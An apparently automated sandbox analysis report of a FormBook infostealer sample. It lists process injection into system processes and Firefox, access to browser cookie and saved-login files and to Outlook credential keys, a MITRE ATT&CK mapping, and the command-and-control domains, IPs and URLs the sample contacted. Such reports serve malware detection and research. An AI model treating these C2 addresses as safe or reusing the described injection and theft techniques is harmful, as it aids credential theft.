            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtOpenKeyEx: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQueryValueKey: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 4624Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27C8008Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087B106 LogonUserW,0_2_0087B106
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00843D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00843D19
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0088411C SendInput,keybd_event,0_2_0088411C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008874BB mouse_event,0_2_008874BB
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 1045-20-11.exe"Jump to behavior
            Source: C:\Program Files (x86)\OmMYORIdyGtOWLCXABixOvtHOYfFndDaSeqYmtgOpbhZSxHmHJqeisBDItAZ\FGcoivYXQsEMNANuoDkk.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0087A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0087A66C
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008871FA
            Source: Certificate 1045-20-11.exe, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Certificate 1045-20-11.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: FGcoivYXQsEMNANuoDkk.exe, 00000002.00000002.4166122921.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000002.00000000.1795016529.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, FGcoivYXQsEMNANuoDkk.exe, 00000007.00000002.4166622080.0000000000CE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008665C4 cpuid 0_2_008665C4
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0089091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0089091D
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_008BB340 GetUserNameW,0_2_008BB340
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00871E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00871E8E
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0085DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0085DDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_81
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_XP
            Source: Certificate 1045-20-11.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_XPe
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_VISTA
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_7
            Source: Certificate 1045-20-11.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2520000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4165331791.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1868757997.0000000002520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1870531753.0000000002F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165463340.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4165026551.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4168934011.0000000004AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1871626103.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4166827472.0000000002450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_00898C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00898C4F
            Source: C:\Users\user\Desktop\Certificate 1045-20-11.exeCode function: 0_2_0089923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0089923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		3
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560129 Sample: Certificate 1045-20-11.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.shenzhoucui.com 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 Certificate 1045-20-11.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 FGcoivYXQsEMNANuoDkk.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 FGcoivYXQsEMNANuoDkk.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 elettrosistemista.zip 195.110.124.133, 50019, 50020, 50021 REGISTER-ASIT Italy 22->34 36 empowermedeco.com 217.196.55.202, 50023, 50024, 50025 AS-DIRECTCONNECTNO Norway 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Certificate 1045-20-11.exe29%ReversingLabsWin32.Trojan.AutoitInject
            Certificate 1045-20-11.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.3xfootball.com/fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=0%Avira URL Cloudsafe
            https://www.empowermedeco.com/fo8o/?SHqP-p=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?SHqP-p=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&0xilO=7vZpwBG0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?SHqP-p=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&0xilO=7vZpwBG100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?0xilO=7vZpwBG&SHqP-p=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/100%Avira URL Cloudmalware
            http://www.rssnewscast.com/fo8o/100%Avira URL Cloudmalware
            http://www.empowermedeco.com/fo8o/0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?0xilO=7vZpwBG&SHqP-p=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truetrue
              		unknown
              empowermedeco.com
              		217.196.55.202
              		truetrue
                		unknown
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.shenzhoucui.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.antonio-vivaldi.mobi
                                              		unknown
                                              		unknownfalse
                                                		high

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.3xfootball.com/fo8o/?0xilO=7vZpwBG&SHqP-p=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.empowermedeco.com/fo8o/true
